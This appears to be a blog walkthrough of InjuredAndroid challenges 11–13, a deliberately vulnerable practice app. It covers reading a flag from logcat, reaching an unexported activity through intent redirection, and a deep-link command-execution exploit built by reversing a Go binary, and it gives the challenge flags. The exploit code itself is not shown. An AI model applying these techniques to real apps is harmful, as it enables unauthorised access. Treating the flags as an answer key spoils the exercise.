Skip to main content

Android Security Challenge: InjuredAndroid Part III (Challenge 11 - 13) (day 95) (~˘▾˘)~

  (URL: https://media.makeameme.org/created/a-challenge-lets.jpg)

This is the third part of the android security challenge injuredAndroid from b3nac, previously in the second post we learn about how misconfigured AWS bucket and firebase can lead to unintended information leak in the app, furthermore, we also learn about interesting a bug in Unicode that let us bypass certain check in the application.

In this post, I'm going to show you how to solve the last three challenges. Without further ado, let's get into it

Challenge 11:

To finish this challenge you need some knowledge on how deep link works. so what is a deep link?

it is just an ordinary URL however instead navigating to a website using prefix http:// or https:// it used its own URL schema to take the user directly to the specific content or resources in the app

this is one of the examples of a deep link in android(taken from android developer official website):

 
<activity
    android:name="com.example.android.GizmosActivity"
    android:label="@string/title_gizmos" >
    <intent-filter android:label="@string/filter_view_http_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "http://www.example.com/gizmos” -->
        <data android:scheme="http"
              android:host="www.example.com"
              android:pathPrefix="/gizmos" />
        <!-- note that the leading "/" is required for pathPrefix-->
    </intent-filter>
    <intent-filter android:label="@string/filter_view_example_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "example://gizmos” -->
        <data android:scheme="example"
              android:host="gizmos" />
    </intent-filter>
</activity>

<activity
    android:name="com.example.android.GizmosActivity"
    android:label="@string/title_gizmos" >
    <intent-filter android:label="@string/filter_view_http_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "http://www.example.com/gizmos” -->
        <data android:scheme="http"
              android:host="www.example.com"
              android:pathPrefix="/gizmos" />
        <!-- note that the leading "/" is required for pathPrefix-->
    </intent-filter>
    <intent-filter android:label="@string/filter_view_example_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "example://gizmos” -->
        <data android:scheme="example"
              android:host="gizmos" />
    </intent-filter>
</activity>
 <activity
    android:name="com.example.android.GizmosActivity"
    android:label="@string/title_gizmos" >
    <intent-filter android:label="@string/filter_view_http_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "http://www.example.com/gizmos” -->
        <data android:scheme="http"
              android:host="www.example.com"
              android:pathPrefix="/gizmos" />
        <!-- note that the leading "/" is required for pathPrefix-->
    </intent-filter>
    <intent-filter android:label="@string/filter_view_example_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "example://gizmos” -->
        <data android:scheme="example"
              android:host="gizmos" />
    </intent-filter>
</activity>

 
<activity
    android:name="com.example.android.GizmosActivity"
    android:label="@string/title_gizmos" >
    <intent-filter android:label="@string/filter_view_http_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "http://www.example.com/gizmos” -->
        <data android:scheme="http"
              android:host="www.example.com"
              android:pathPrefix="/gizmos" />
        <!-- note that the leading "/" is required for pathPrefix-->
    </intent-filter>
    <intent-filter android:label="@string/filter_view_example_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "example://gizmos” -->
        <data android:scheme="example"
              android:host="gizmos" />
    </intent-filter>
</activity>
Deep-link can be set inside an intent-filter tag, a developer can specify the schema of the link by putting android:scheme XML tag and host by putting android:host XML tag. As you can see from the example it is up to you what name or prefix you want to use for you deep-link app.

 if we look into the AndroidManifest.xml file we can see the specification of the challenge 11 activity deep-link

so in order to invoke the following activity component of the android app, we need to pass URI using this prefix "flag11://". We can send the URI by using adb command like below figure




But! in order to finish this challenge we need to input the flag and by looking at the source code we can get the flag by using logcat since the flag is shown in the debugging log





we got the 11th flag :)

11th flag => HIIMASTRING

the second way to get the flag according to the walkthrough is through the binary called "menu" it says if we run it will show the flag



Challenge 12:

in order to finish this challenge you need to craft your own exploit using android studio



by looking at the MainActivity class that responsible for calling the class that host challenge 12, we can see that you need to use another exported activity to invoke our target FlagTwelveProtectedActivity class since it is unexported



from the information above it is pretty clear we need to use ExportedProtectedIntent activity



looking at the source code we need to pass a parcelable inside the intent using index "access_protected_component". This extra is then used to invoke the protected activity component

Parcelable is basically just implementation of the Java Serializable so if you want to pass a kotlin or java object you can use this function.

once we pass the right intent, it turns out that we need to pass one more index in the intent again called "totally_secure" to pass this level and it needs to contain https:// schema on it



so how do we do this?



pretty simple! first, you need to create an intent object to invoke FlagTwelveProtectedActivity class and specify the intent extra "totally_secure" on it then you create another intent object that will send the previously crafted intent to the ExportedProtectedIntent, like the above figure.

Run the code and you pass this level(no flag !!!)

Challenge 13:

The last challenge involves a little bit of reverse engineering and RCE exploit to pass the challenge.





looking at the manifest file we can see that it need to invoke using deep-link again but you need to specify the host, thus, it will go like this "flag13://rce"



looking at the source code above when we called the class it first called the copyAssets() function and as you can see we need to pass three parameters binary, param, and combined along with the deep-link. To pass this level we need to supply the combined parameter with the right input

the binary and param parameter is used to invoke runtime function that lets us execute a program but it is only limited to inside the files directory which is inside the application internal directory


let's take a look at the copyAssets() function first


as the name implies it used to copy the content inside the assets folder but the destination is the same as the location where the binary and param parameter input execute which is in "files" directory

looking at the application there is the only file named "narnia" inside the assets folder and it turns out it is a go executable



let's try to reverse engineer it using Ghidra. If you never reverse engineer go binary you will feel overwhelmed with the result but all you need to do is focus on the main.main function since this equivalent to main() function in C


when you look at the first few line of the code there is a string comparison:



let's try to decode the hex string and remember this is still in little-endian we need to reverse it to make it more readable


ok let's try to input this string as the parameter and the result show several options that we can use



from the looks of it is pretty straight that we need to use testOne,testTwo, and testThree together



combining these three outputs we got "Treasure_Planet" and I think this is the secret string that we need to supply in combined parameter

from all of this information, let's create the exploit



supplying parameter in deep-link follow the same manner as normal http:// URL and once I run the Exploit I pass the challenge, cool!

13th flag => Treasure_Planet

Conclusion:

The following vulnerable application taught us about a variety of weakness that can affect android application, this is a really good exercise for you who wants to deep dive into android application bug bounties. I would say the creator of this challenge b3nac did a really good job and I wish he will create more masterpiece like this again in the near future




Labels:

Comments

Post a Comment

Popular posts from this blog

Having fun analyzing nginx log to find malicious attacker in the net (ง'̀-'́)ง (day 37)

  What makes you sleepless at night? is it because of a ghost or scary stories? is it because you have an important meeting tomorrow? or is it because you have an exam? For me, what keeps me up all night is that I keep thinking about what happens to a website that I just created, is it safe from an attacker (certainly not) or did I missing some security adjustments that lead to vulnerability? well I'm not the best secure programmer in the world, I'm still learning and there is a big possibility that I can make a mistake but for me, a mistake can be a valuable investment to myself or yourself to be better so from this idea, I want to know more about what attackers casually do when attacking a website. Here in this post, I'm going to show you how I analyzed attack to the website that I have permission to design and also some interesting findings that I could get from the analysis Background: All of this analysis comes from the traffic that is targeted to th
Post a Comment
Read More »

Utilize Pwntools for crafting ROP chain :') (day 69)

who doesn't like pwntools? it is a very versatile tool and can be customized according to our need using the python script but did you need to know that pwntools itself can help us to automatically craft a rop chain for us? so in this post, I will show you how to make rop chain less painful and make pwntools do all the heavy lifting. To demonstrate this I will use the binary challenge callme 64 bit from ropemporium link: https://ropemporium.com/challenge/callme.html Crashing the app: Like any other exploitation process, we need to crash the program by generating a long string pattern to determine the offset. based on the information from the above figure we can see that we required to provide 40 bytes of offset Fun stuff: now this where the fun stuff began write the following python script: as in the guideline of the challenged said we need to chain the function call by first to call the callme_one function, callme_two function and then callme_three funct
Post a Comment
Read More »

WriteUp PWN tarzan ROP UNICTF ಠ_ಠ (day 61)

So in this post, I'm going to talk about how to solve the Tarzan pwn challenge from UNICTF 2019. Back in the day when the competition is still going I couldn't finish it and don't have any clue to solve this but this time I was able to finish it :) Also in this post, we will be going to be heavily focused on how to utilize pwntools to construct a ROP chain. If you kinda confused about my explanation in this post you can refer to this following youtube video, link: https://www.youtube.com/watch?v=gWU2yOu0COk I build the python script based on this video Ok, let's get started! In this challenge, you will get two binary first go with tarzan and libc-2.29.so by providing .so file it tell us what version library that the target machine is using this could help us to do ROP chain. first, we run the Tarzan binary to get the basic idea of the program work and as you can see it just show you some text, newline and when you try to input something it doesn't gi
Post a Comment
Read More »